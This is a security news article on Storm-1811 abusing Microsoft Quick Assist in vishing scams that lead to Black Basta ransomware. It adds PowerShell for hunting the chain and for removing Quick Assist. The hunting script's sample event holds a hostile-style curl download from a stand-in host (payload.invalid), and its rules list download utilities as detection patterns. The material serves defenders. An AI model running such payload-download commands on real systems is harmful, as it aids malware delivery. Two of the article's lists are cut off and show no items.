Hackers often target remote assistance tools because they provide a direct channel into the systems they want, with minimal effort.
These tools are built for remote control and access, which makes them very appealing to attackers looking to break into networks or take over specific devices.
Microsoft observed the Storm-1811 group using Quick Assist for social engineering attacks that deploy Black Basta ransomware.
The attacks begin with vishing, exploit Quick Assist's remote access for initial compromise, and then deliver malware like:-
Microsoft is improving Quick Assist's warnings against tech support scams, while its detections block the malicious activity. Blocking remote tools that are not in use and educating users on recognizing scams can further reduce the risk.
The threat actors impersonate IT support in vishing calls and trick the targeted person into granting them Quick Assist remote access.
They usually do this by pretending to fix a problem or by offering help with a flood of spam email.
While on the call, Microsoft said, they got the victim to launch Quick Assist, enter the code they supplied, enable screen sharing, and grant control, which fully compromised the device.
Once control is taken over Quick Assist, the attackers run scripts that download malicious payloads, sometimes disguised as spam filter updates, in order to harvest credentials.
Observed payloads included Qakbot and remote management tools such as ScreenConnect, as well as Cobalt Strike; Storm-1811 then used the access gained through Qakbot and Cobalt Strike to deploy Black Basta ransomware.
After initial access, the attackers use ScreenConnect for persistence and lateral movement, NetSupport Manager for remote control, and OpenSSH for tunneling.
They then perform domain enumeration and use PsExec to deploy Black Basta ransomware across the environment, building on the access that Qakbot and Cobalt Strike gave Storm-1811.
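The chain above (Quick Assist session, scripted payload download, unapproved remote-management tools, PsExec) leaves a recognizable trail in process-creation telemetry. The following PowerShell is an added example, not code from the article or from Microsoft: it runs a few hunting rules over a constructed set of process-creation records. The record field names (Host, Parent, Image, CommandLine) and the sample events are assumptions; map them onto your EDR or Event ID 4688 export.

```powershell
# Added example (not from the article or from Microsoft): hunting rules for the
# Quick Assist abuse chain, applied to a constructed set of process-creation records.
# Field names are assumptions; adapt them to your telemetry schema.

function Find-QuickAssistAbuse {
    param([Parameter(Mandatory)][object[]]$Events)

    # Shells and download utilities that Quick Assist itself has no reason to launch
    $shells   = 'cmd.exe', 'powershell.exe', 'pwsh.exe', 'curl.exe', 'certutil.exe', 'mshta.exe'
    # Remote-management binaries named in the article; treat as unapproved unless allow-listed
    $rmmTools = 'ScreenConnect', 'NetSupport', 'client32'

    foreach ($e in $Events) {
        $reasons = @()

        # 1. A Quick Assist session spawning a shell or download utility
        if ($e.Parent -eq 'QuickAssist.exe' -and $shells -contains $e.Image) {
            $reasons += 'Quick Assist spawned a shell/download utility'
        }
        # 2. A command line that fetches a remote payload
        if ($e.CommandLine -match 'curl|Invoke-WebRequest|DownloadString|bitsadmin') {
            $reasons += 'remote payload download'
        }
        # 3. An unapproved remote-management tool appearing on the host
        foreach ($t in $rmmTools) {
            if ($e.Image -like "*$t*") { $reasons += "remote-management tool: $t" }
        }
        # 4. The PsExec service binary (lateral movement / ransomware deployment)
        if ($e.Image -eq 'PSEXESVC.exe') {
            $reasons += 'PsExec service installed'
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Time    = $e.Time
                Host    = $e.Host
                Image   = $e.Image
                Reasons = ($reasons -join '; ')
            }
        }
    }
}

# Constructed sample events (not real telemetry). Only the last one is benign.
$events = @(
    [pscustomobject]@{ Time = '2024-05-10T14:02:11'; Host = 'WS01'; Parent = 'QuickAssist.exe'
                       Image = 'cmd.exe'; CommandLine = 'cmd.exe /c curl -o C:\Users\Public\spamfilter_update.zip http://payload.invalid/update' }
    [pscustomobject]@{ Time = '2024-05-10T14:03:40'; Host = 'WS01'; Parent = 'cmd.exe'
                       Image = 'powershell.exe'; CommandLine = 'powershell.exe -File C:\Users\Public\run.ps1' }
    [pscustomobject]@{ Time = '2024-05-10T14:05:02'; Host = 'WS01'; Parent = 'explorer.exe'
                       Image = 'ScreenConnect.ClientService.exe'; CommandLine = 'ScreenConnect.ClientService.exe' }
    [pscustomobject]@{ Time = '2024-05-10T15:10:00'; Host = 'DC01'; Parent = 'services.exe'
                       Image = 'PSEXESVC.exe'; CommandLine = 'PSEXESVC.exe' }
    [pscustomobject]@{ Time = '2024-05-10T09:00:00'; Host = 'WS02'; Parent = 'explorer.exe'
                       Image = 'notepad.exe'; CommandLine = 'notepad.exe' }
)

Find-QuickAssistAbuse -Events $events | Format-Table -AutoSize
```

Run against the constructed data, the first event fires rules 1 and 2, the third fires rule 3 and the fourth fires rule 4; the notepad event produces nothing. In a real deployment the highest-fidelity signal is rule 1, since Quick Assist spawning a shell has no legitimate business use, whereas rules 3 and 4 need an allow-list for RMM tools and PsExec usage your own IT staff rely on.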
Black Basta is a closed ransomware operation distributed by a small number of actors who rely on initial access brokers; defenses that focus on the pre-ransomware stages therefore reduce its impact.
Here below we have mentioned all the recommendations:-
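The recommendation to block remote tools that are not in use can be applied to Quick Assist itself. The following PowerShell is an added example, not code from the article or from Microsoft: run from an elevated session, it checks whether Quick Assist is present on the machine, removes it, and verifies the result. The capability name `App.Support.QuickAssist*` and the Store package name `MicrosoftCorporationII.QuickAssist` are the ones I know from Microsoft's documentation; confirm them on your Windows build before rolling this out at scale.

```powershell
# Added example (not from the article or from Microsoft): remove Quick Assist where it is
# not used, as the article's mitigation suggests. Requires an elevated PowerShell session.
# Capability and package names are taken from Microsoft's documentation; verify on your build.

# Older builds ship Quick Assist as a Windows capability.
$capability = Get-WindowsCapability -Online |
    Where-Object { $_.Name -like 'App.Support.QuickAssist*' }

if ($capability -and $capability.State -eq 'Installed') {
    Write-Host "Removing built-in Quick Assist capability: $($capability.Name)"
    Remove-WindowsCapability -Online -Name $capability.Name | Out-Null
}

# Newer builds ship Quick Assist as a Microsoft Store app instead.
$storeApp = Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist' -ErrorAction SilentlyContinue
if ($storeApp) {
    Write-Host 'Removing Store version of Quick Assist for all users'
    $storeApp | Remove-AppxPackage -AllUsers
}

# Verify: the capability should report NotPresent and the package lookup should return nothing.
Get-WindowsCapability -Online |
    Where-Object { $_.Name -like 'App.Support.QuickAssist*' } |
    Select-Object Name, State
Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist' -ErrorAction SilentlyContinue
```

Removing the tool only helps where no one legitimately needs it; where the help desk does use Quick Assist, pair it with the user education the article mentions so that staff know support will never cold-call and ask for a session code.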